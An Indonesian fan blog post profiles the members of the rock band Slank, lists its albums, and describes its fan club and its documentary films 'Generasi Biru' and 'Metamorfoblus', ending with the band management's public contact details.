posisi : leader + drummer
idola : Rolling stones
bimbim adalah pendiri dan pembentuk slank dan bermain sebagai drummer di SLANK.

 

Akhadi Wira Satriaji aka KAKA (VOCALIS)


Siapa ngga kenal Kaka. Orang paling depan di setiap Konser grup Musik Slank. Pemilik suara serak yang punya ciri khas tersendiri ini ternyata bernama lengkap Akhadi Wira Satriaji. Style apa adanya, rambut gimbal dan kadang suka telanjang dada di setiap gelaran konser slank dan selalu meneriakkan serta menyebarkan virus perdamaian buat seluruh Slankers. penampilannya di panggung dapat menghipnotis seluruh Slankers yang menyaksikannya.

 

Kaka lahir di Jakarta, pada tanggal 10 Maret 1974. Ia adalah salah satu personel grup musik, Slank, di mana dirinya menjadi vokalis. Sebelumnya vokalis Slank adalah Uti dan Well Welly. Formasi ini dari Awalnya Slank berdiri pada tahun 1983. Sayangnya grup ini tidak bisa bertahan dan membubarkan diri. Selanjutnya berturut-turut terjadi perombakan personil sampai akhirnya terbentuk formasi ke-14 pada 1996 yang bertahan sampai sekarang.

Bungsu dari empat bersaudara ini mulai mengenal musik sejak SMP. Namun dirinya bergabung dengan Slank baru saat duduk di kelas 1 SMA pada tahun 1989. Ia menempati posisi vokal menggantikan posisi Erwan yang keluar dari Slank. Dunia artis yang penuh kehidupan glamour dan foya-foya sulit untuk dihindari, Kaka pun turut terjebak dalam dunia hitam narkoba. Awal mula mengkonsumsi pil neraka ini adalah mencoba-coba, tetapi kemudian jadi ketagihan. Akhirnya sejak tahun 2000, dengan dibantu terapi obat- obatan Cina, Kaka menjauhkan diri dan tidak menyentuh barang haram itu lagi.

Lelaki yang punya Performance unik ini, adalah suami dari perempuan bernama Natascha, yang dinikahinya pada hari Jumat tanggal 13 Desember 2002. dan saat ini memiliki seorang anak, Chaska Satriaji, yang lahir pada tanggal 6 April 2004. Pernikahan ini merupakan pernikahan kedua Kaka. Dari pernikahan pertamanya, Kaka dikaruniai seorang anak bernama Solielluna (lahir 1996). Harapan Kaka dan Natascha, Chaska Satriaji bakal pintar menentukan jalan hidupnya sendiri, tanpa hambatan. Mudah-mudahan deh Ka'.

profil lengkap 
nama :Akhadi Wira Satriaji biasa di panggil KAKA
tempat tanggal lahir: Jakarta, 10 Maret 1974
agama: Islam 
genre: unknown
idola: The Rolling Stones, Bob Marley


Ivan Kurniawan Arifin aka IVANKA ( BASIST)


Bassist dengan talenta groove yang unik, friendship dan banyak diskusi bareng, bassist sabar yang lebih memilih Alluric Rhythm Groove, main Reggae-nya juga asyik, dialbum Slank dia buktiin bahwa main bass ngga perlu rumit dan banyak note, hanya perlu Soul dengan pendekatan Rock n Roll and Blues aja. Style apa adanya plus Kupluk yang selalu menemaninya di setiap konser musik Slankdengan pembawaan yang cool banget adalah ciri khas dari Bassist berkulit gelap ini. Dia adalah Ivanka, pencabik bass Slank yang pernah mengorbitkan dan menggarap salah satu album reggae negeri ini, Cozy Republik.


Ivanka adalah kepanjangan dari Ivan Kurniawan Arifin yang merupakan nama lengkapnya. Dalam Group Slank, Ivanka menggantikan posisi Bongky yang hengkang pada tahun 1997. Ivanka gabung bersama slank pada formasi slank ke 14 (Bimbim,Kaka, Abdee dan Ridho) yang pada waktu itu mengalami masa transisi. Pria kelahiran Jakarta, pada tanggal 09 Desember 1971 ini, sebelumnya pernah ngeband bareng Abdee Negara di Flash Band pada tahun 1988 dan Imanez pada tahun 1994. Bersama Slank Ivanka telah menghasilkan album - album Slank yang spektakuler, mulai dari album lagi sedih hingga sekarang.

profil lengkap
nama: Irvan Kurniawan Arifin alias IVANKA
tempat tanggal lahir: Jakarta. 09 desember 1971
agama: Islam
genre: groove, bluees, dan reggae
music bacground: 1988 - Flash Band with Abdee,1994 - Play with Imanez.
idola: Rolling stones, the beatle,Jimmy Hendrix.

Abdee Negara aka abdee (guitaris)



Gaya rambut urakan plus stelan kemeja or kaus ketat lengkap dengan pernak perniknya menjadi ciri khas Abdee Negara di setiap konser musik Slank. Gitaris Kelahiran Donggala, Sulawesi Tengah ini menggantikan Posisi Pay pada tahun 1997 yang sudah mendarah daging di semua fans Slank saat itu. Awalnya, para Slankers sempat meragukan kapasitasnya sebagai salah satu pengganti Pay. Namun, kenyataannya kemudian sangat tidak sesuai dengan perkiraan awal para Slankers. Bahkan kontribusi yang diberikan oleh Abdee terhadap Slank bisa dibilang melebihi Pay.


Ia hijrah dari kota Palu ke Jakarta untuk menjadi musisi profesional. Pertama-tama ia bergabung bersama band Ecky Lamoh, Gideon Tengker, dan Henky Supit. Lantas kemudian menjadi session player untuk berbagai artis lain mulai dari Ermy Kulit sampai Trio Kwek-Kwek. Namanya menjadi pembicaraan luas saat ia dan rekannya, Ridho didaulat sebagai gitaris baru Slank.

Selain sebagai gitaris, Abdee juga jago sound engineer. Abdee lah yang kini menangani pembuatan album-album Slank. Vokal pendukung, penulis lagu dan produser. Selain bermain musik dengan rekan Gitarnya di Group Slank, Ridho, Abdee pernah bermain dengan gitaris internasional lainnya, salah satunya Paul Gilbert. Selain Slank, band utamanya, Abdee juga memproduseri band Indonesia lainnya, Serieus. Abdee juga menjadi salah satu clinician di majalah G Plus bersama anggota gitaris.com, Owen. Untuk gitar, Abdee menjadi endorser dan artis untuk merk gitar Extreme. Meskipun begitu, ia tetap menginginkan model Telecaster.

Sejak memulai karir musiknya, Abdee selalu bermain dan mempersembahkan gaya rock-blues buat para Slankers. Abdee juga sering menampilkan permainan solo dengan menggunakan slide. Jika anda mendengar permainan slide didalam lagu-lagu Slank maka bisa ditebak, Abdee lah yang memainkannya. Bersama Slank, Abdee telah banyak merilis album Slank, Mulai dari Album Tujuh (1997) sampai dengan sekarang.

profil lengkap

nama: abdee negara alias abdee slank
tempat tanggal lahir: Donggala Sulteng, 28 juni 1968
agama: Islam
genre: Blues,rock,(BEBAS)
Idola: Keith Richard, Ry Cooder
karir music: 1988- belajar teori musik di ILW sambil bermain band dengan Ivan N Flash band,1990-1997 jadi session player di studio dan panggung,1997 akhir, bergabung dengan Slank sampai sekarang.

Mohammad Ridwan Hafiedz aka Ridho (guitaris)


Mohammad Ridwan Hafiedz atau terkenal dengan namaRidho Slank adalah seorang gitaris, vokal pendukung, dan penulis lagu bagi grup musik Slank. Pria kelahiran Ambon, Maluku, 3 September 1973 itu selalu cool dalam setiap penampilannya bersama Slank. Pendamping Abdee Negaraini selain sebagai gitaris Slank juga sibuk memimpin sebuah klinik gitar di Jakarta. Permainan Gitarnya selalu memukau peserta Klinik Gitar. Bersama Slank, Ridho telah membuat sembilan album studio dan tiga album live serta satu album kompilasi yang dirilis Mei 2006. Pada 2007, Ridho bersama Ipang dari BIP bersama mengerjakan scoring dansoundtrack film TENTANG CINTA.


Ridho lahir dan besar dalam keluarga Islam di Ambon. Dia bermain gitar sejak berusia 7 tahun. Karier profesionalnya mulai saat membentuk grup musik LFM di tahun 1991. Setelah menyelesaikan pendidikan formalnya, Ridho pergi ke Hollywood, Amerika Serikat untuk belajar musik di Musician Institute untuk mengasah bakatnya. Pada tahun 1996, tiga dari lima anggota Slank mengundurkan diri. Alasan pengunduran diri mereka terkait masalah kecanduan narkoba yang dialami oleh sang drumer, Bim-Bim dan vokalis,Kaka. Meski demikian, Slank kemudian menambah 3 anggota baru (Abdee,Ivanka, dan Ridho), untuk ‘menghidupkan’ kembali Slank.

Ridho menikah dengan Ony Serojawati pada 25 Agustus 2001. Dari pernikahan ini, Ia dikaruniai tiga orang anak, Marco Maliq Hafiedz, Omar Hakeem Hafiedz dan Stella Aisha Hafiedz. kehadiran anak-lah yang membuat mentalnya berubah. Dia mengaku jadi penakut. "Dulu saya paling maniak terbang. Tapi sekarang jadi takut," ungkap suami Ony Serojawati.

Soal rencananya ke depan, Ridho ingin membuat buku. "Buku yang bisa dipake untuk pegangan anak muda yang tertarik pada musik. Sayangnya, keinginan itu kalah cepat dengan Bunda Iphet. Yah, Bunda Iphet yang juga manajer Slank memang baru meluncurkan buku setebal 157 halaman berjudul "Bundaku Sayang". Buku itu adalah kumpulan artikel yang ditulis Bunda Iphet di koran Slank.

Profil lengkap

Nama Lengkap : Mohammad Ridwan Hafiedz alias ridho
Tempat / Tanggal Lahir : Ambon / 3 September 1973 
Agama : Islam
genre: Rock And Blues
karir musik: 1991:membentuk LFM,1995:sekolah musik di Institute Musician, Hollywood,1997: bergabung dengan Slank sampai sekarang.
 BUNDA IPHET (SANG MENEJER DAN IBUNDA)


Bunda IFET,adalah orang yang paling berpengaruh di kubu SLANK, bunda IPHET adalan ibunda dari bimbim slank, dan juga sebagai menejer sekalian penasehat group band slank, kabarnya,bunda Iphet lah yang membuat bimbim dan kawan-kawan kuat dan tegar,saya sendiri sangat mengidolakan sosok bunda IPHET dan pernah terlintas di benak saya,andai aku anak dari bunda IPHET,betapa beruntung nya aku mendapatkan sosok ibu yang begitu kuat,tegar,dan penuh kasih sayang.

baru-baru ini bunda tlah launcing sebuah buku yang berjudul " BUNDAKU SAYANG" buku pertama bunda iphet ini di angkat dari artikel-artikel yang ditulis oleh bunda di koran slank.

profil lengkap

belum menemukan referensi dari bunda ataupun artikel.


ALBUM-ALBUM SLANK

ALBUM STUDIO

1. 1990 - Suit-Suit....Hehehe (Gadis Sexy) 
2. 1991 - Kampungan 
3. 1993 - Piss 
4. 1995 - Generasi Biru 
5. 1996 - Minoritas 
6. 1996 - Lagi Sedih 
7. 1997 - Tujuh 
8. 1998 - Mata Hati Reformasi 
9. 1999 - 999+09 
10. 2001 - Virus 
11. 2003 - Satu Satu 
12. 2005 - PLUR 13. 2006 - Slankissme 
14. 2007 - Slow But Sure 
15. 2008 - Slank - The Big Hip 
16. 2008 - Anthem For The Broken Hearted

ALBUM KOMPILASI
1. 1998 - Konser Piss 30 Kota 
2. 2001 - Virus Roadshow 
3. 2003 - Bajakan! Album Live
4. 2004 - Road to Peace Album Soundtrack
5. 2007 - Original Soundtrack "Get Married" 
6. 2009 - Original Soundtrack Generasi Biru 

PENGGEMAR / SLANK FANS CLUB

Penggemar Slank adalah grup cinta damai dan pada kenyataanya Slank tidak saja berhasil merebut hati penggemar, tapi Slank juga telah berhasil membangkitkan semangat dan solidaritas dari sebuah generasi untuk punya sikap. Dan Slank memiliki kelompok penggemar yang fanatik dan kreatif, yang dikenal sebagai Slankers. Slank Fan Club Slank Fan Club (SFC) adalah club resmi yang dibentuk oleh manajemen Slank untuk menampung para penggemar fanatik Slank. Slankers Club yang merupakan wadah para Slankers terbentuk ketika Slank melakukan Konser Piss 30 kota pada tahun 1998. Bunda Iffet, sebagai manager Slank melihat komunitas Slankers yang sudah ada harus di berdayakan. Oleh sebab itu ketika Slank konser di Malang, sekumpulan Slankers itu di pangil oleh Bunda untuk di beri pengarahan. Tercetuslah ide Bunda untuk memberikan wadah untuk Slankers yang sekarang diberi nama Slank Fans Club.[5]. Buletin Slank Untuk menyampaikan informasi kepada para Slanker, Slank dan manajemennya memutuskan untuk membuat sebuah newsletter yang kemudian disebut dengan nama Buletin Slank. Buletin ini berisi jadual, kisah-kisah pendek perjalanan tur panggung slank dan sebagainya. Nama buletin sendiri dipakai sebagai simbol agar para slanker melingkari (buletin) jadwal kegiatan slank di kalender kegiatan mereka masing-masing.


FILM-FILM SLANK
  
Generasi biroe slank 

Kehadiran film dokumenter musikal yang diperankan para personel Slank, "Generasi Biru" bisa dibilang merupakan kado Indah di hari kelahiran kelompok musik legendaris pop-rock Indonesia. Tidak hanya itu, film garapan sutradara beken, Garin Nugroho, cukup mengobati rasa rindu para Slanker, termasuk yang tinggal di Luar Negeri. Pantau Indonesiantunes.com dari tiga bioskop yang memutar film tersebut, animo penonton cukup tinggi. Rata-rata yang menonton anak muda (SLTP, SLTA hingga Mahasiswa). Artinya, kehadiran film ini bisa dibilang menjadi barometer bagi para Slankers yang ternyata masih setia mengikuti perjalanan grup asal Jl Potlot Duren Tiga Jakarta ini.Lalu apa yang menjadi kelebihan film ini? Sutradara Garin Nugroho sepertinya tidak mau melepaskan label Slank yang merakyat dan kritis dengan lirik lagunya. Tidak cukup itu, pilihan lagu dalam film ini juga terseleksi. Selain tembang cinta, sang sutradara juga memilih lagu yang membawa pesan moral, yang sudah menjadi misi slank sejak berdiri tahun 1983. Hadirnya film ini terasa lebih lengkap dengan diluncurkannya CD/Kaset album "Generasi Biru" yang dipaket dengan VCD beberapa klip lagu Slank, seperti 'Slank Dance" dan "Monogami" yang merupakan lagu baru dalam album ini.

Kehadian album ini bisa dibilang semakin memperkuat eksistensi Slank diblantika musik Indonesia yang sudah 25 tahun berkiprah. Selain itu, album ini juga bisa menjadi obat rindu para Slankers dengan lagu baru band ini, dan sekaligus membuktikan visi dan misi dari berdirinya Super Grup Legendaris ini yang kerap membawa pesan moral.

Misalkan dalam alunan lagu "Gosip Jalanan" diambil dari album PLUR (2004) dan sempat memanaskan kuping wakil rakyat (DPR). Kecaman anggota DPR tidak berarti menyurutkan langkah Slank mendukung ditangkapinya para koruptor. Slank malah meneriakkan lagu itu di kantor Komisi Pemberantasan Korupsi (KPK) di kuningan Jakarta. Coba simak saja liriknya: Mau tau gak mafia di senayan/kerjanya tukang buat peraturan/bikin UUD ujung2nya duit.

Dialbum ini ada dua lagu diantara hits lama tadi yang ditampilkan dalam versi live, yakni “Indonesiakan Una” (Alb PLUR), dan “Mars Slankers” (Alb Road to Peace) yang direkam langsung dari acara Slankers Day pada bulan Juli 2008 silam. Selain itu, ada pula lagu yang direkam ulang ditengah padatnya jadwal tur Slank di Indonesia dan Amerika Serikat pada Oktober sampai Desember 2008 lalu, berjudul "Cekal" yang diambil dari Alb Piss.

Tak kalah menariknya untuk disimak dalam album ini adalah tembang baru yang ringan karya Bimbim, "Slank Dance". Lagunya enak didengar, paduan musiknya simpel, yakni kombinasi cabikan gitar Ridho dikolaborasi dengan nada-nada nge-beat yang asik untuk joget (dance). Tidak hanya itu, lirik yang mudah diingat dan memberikan semangat;Jangan takut keluarlah/Hadapi dunia dengan menari... Berkhayallah seluas biru langit/berfikirlah sedalam biru laut/ Horisonal.. sama rata sama rasa.

Lagu "Monogami" yang bercerita tentang cinta dan kesetiaan juga bisa dibilang menjadi dinamisasi karir musik slank yang semakin "dewasa". Variasi nada-nada ringan dan slow dipadu dengan hentakan musik yang nge-rock, plus vokal kaka yang khas menjadikan kekuatan dalam lagu ini.

Diusianya yang seperempat abad, Slank telah membuktikan eksistensinya dalam dunia musik Indonesia dan dunia. Lewat slank, Indonesia bisa berkoar kepenjuru dunia lewat musik dan lirik. Ciri khas musiknya yang easy listening dan syairnya yang kritis, menjadikan Slank icon rock Indonesia.

Metamorfoblus



“Metamorfoblus” adalah sebuah film dokumenter yang membahas kehidupan beberapa Slankers yang sangat dipengaruhi oleh Slank itu sendiri. Film ini disutradarai oleh Dosy Amar yang dahulu juga turut menyutradarai “Generasi Biru”. Melihat pengaruh Slank dalam kehidupan Slankers dan bagaimana Slankers menginterpretasikan lirik dari setiap lagu Slank dari sudut pandang mereka adalah sesuatu yang unik dan berbeda. Namun, itu bukanlah satu-satunya yang unik dari film dokumenter ini. Dengan band ikonik seperti Slank, film ini ternyata tidak dirilis ke jaringan bioskop komersil seperti film-film lainnya. Ursula Tumiwa, sebagai produser “Metamorfoblus dan “Generasi Biru”, pun menjelaskan mengenai apa penyebabnya dan bagaimana sistem distribusi “Metamorfoblus” yang akan menggantikan cara perilisan film yang umum tersebut.


Semua berawal dari keadaan yang mengkhawatirkan dari keadaan distribusi film di Indonesia. Di sini, hanya ada dua kelompok yang bisa mendistribusikan film-film ke berbagai wilayah Indonesia. Namun, bioskop tidaklah tersebar secara merata dan hanya berpusat di kota-kota besar. Jumlah bioskop yang ada sekarang juga jauh dari kata ‘cukup’ untuk bisa menjangkau masyarakat Indonesia yang luas. Kendala biaya pun juga harus dihadapi oleh pembuat film di Indonesia demi bisa mendistribusikan filmnya. “Biaya membuat copy film di Indonesia itu mahal sekali,” ujarUrsula . Keadaan yang memprihatinkan ini membuat konsep ‘meraup keuntungan sebanyak-banyaknya dalam waktu sesingkat-singkatnya’ semakin menggila. “Film Indonesia itu bisa cuma berumur sekitar dua minggu di bioskop. Setelah itu, mereka turun,” tambahUrsula.


Pengalaman Ursula dalam bekerja sama dengan pihak distributor film saat menangani “Generasi Biru” dahulu pun membuahkan gagasan yang berani. “Saya memutuskan untuk mencari sponsor untuk membiayai pemutaran film ini sendiri. Kebetulan “Metemorfoblus” ini kan juga film dokumenter. Biasanya, film dokumenter yang dirilis di jaringan bioskop yang sudah ada itu suka sepi penonton. Jadi, pihakdistributor juga punya alasan untuk ragu mendistribusikan film ini. Makanya, saya tidak bisa menyalahkan mereka juga dan memilih menggunakan cara bioskop alternatif,” katanya.


Dalam gerakan bioskop alternatif ini, “Metamorfoblus” akan bergerilya ke tempat-tempat yang relatif layak sehingga pembuat film dan penonton film dapat bertemu dalam sebuah peristiwa bernama pemutaran film. Tujuannyaadalah memberikan jembatan yang jauh lebih lebar, antara para pembuat film dan para penonton film, sehingga bisa diapresiasi sebagai sebuah karya seni dan sebuah hiburan yang bisa menghasilkan nilai-nilai ekonomi. Layar tancapadalah salah satu cara yang akan dipakai dalam pola bioskop alternative ini. Pengertiannya adalah layar bisa ditancapkan di mana saja selama tempat itu bisa diterima oleh masyarakat sebagai tempat untuk menonton film.


Film “Metamorfoblus” sendiri memang bukanlah film pertama yang menggunakan konsep ini. Sudah ada beberapa film independen lain di Indonesia yang memulainya dengan memutar film di berbagai komunitas, kampus, dan kineklab. Selain itu, sebuah usaha menambah ruang pemutaran film di Indonesia bernama Bioskop Merdeka pun sudah muncul, walaupun masih berpusat di daerah Jakarta Selatan.Ursula juga menyatakan betapa Slank sendiri mendukung bioskop alternatif ini. ” Musik Slank sendiri juga memiliki semangat indie. Jadi, mereka juga sangat mendukung gerakan indie untuk mendistribusikan film ini.”


Dari kacamata seorang produser, memproduksi sebuah film untuk dirilis dengan cara gerilya tentu memiliki tantangan tersendiri. “Sebagai produser, saya punya tanggung jawab moral dan komersil. Saat menghadapi investor untuk mendanai produksi film “Metamotfoblus”, saya berusaha meyakinkan bahwa penghasilan yang didapatkan dari cara bioskop alternatif ini masih bisa di-generate,” lanjutUrsula. Hasil penelitiannya dari pemutaran “Generasi Biru” dahulu membuat Ursula bisa membuat perkiraan penonton untuk “Metamorfoblus” dan tempat pemutaran seperti apa yang cocok. “Di tempat pemutaran alternatif, ternyata penonton bisa jadi jauh lebih rileks. Di sebuah pemutaran “Generasi Biru”, saya bahkan mendengar penonton nyanyi bersama-sama saat menonton.”


Dalam tahap pertama, roadshow film “Metamorfoblus” ini akan diadakan di 10 kota, meliputi Jakarta, Bogor, Bekasi, Cirebon, Bandung, Yogyakarta, Semarang, Malang, dan Probolinggo. Kota-kota yang berada di Pulau Jawa tersebut akan menjadi sebuah percobaan sebelum nantinya akan diputar ke wilayah Indonesia lainnya.


“Sebenarnya sudah banyak sekali permintaan untuk pemutaran film ini. Dari Indonesia bagian timur pun juga sudah ada permintaan yang masuk. Bahkan, ada juga yang meminta diadakan pemutaran di anjungan lepas pantai (sebuah bangunan untuk kegiatan eksplorasi atau eksplorasi bahan tambang, minyak bumi, gas bumi, dan lain-lain). Jadi, kalau dianggap penonton Indonesia itu berkurang sebenarnya kurang tepat. Di berbagai tempat di Indonesia, masih banyak calon penonton,”kata Ursula. Ketika ditanya mengenai dampak seperti apa yang diharapkan bisa terjadi kepada perfilman Indonesia, Ursula pun berkata,“Saya berharap akan terciptanya kesadaran kalau penonton itu selalu ada.”





markas SLANK dan informatioNs contack

Slank Management
Address:
Jalan Potlot No. 14, Duren Tiga
Jakarta Selatan (12760)
DKI Jakarta Indonesia

Telephone:
+6221 79196819 / +6221 7943252 /+6221 7990602
Fax:
+6221 79193437
Email Address:
mgt@slank.com / info@slank.com
Website
www.slank.com

SUMBER:

WWW.SLANK.COM

Semoga bisa menambah sedikit pengetahuan sahabat-sahabat SLANKER ,

pEacE lOvE AnD ReSpeCT.












read more...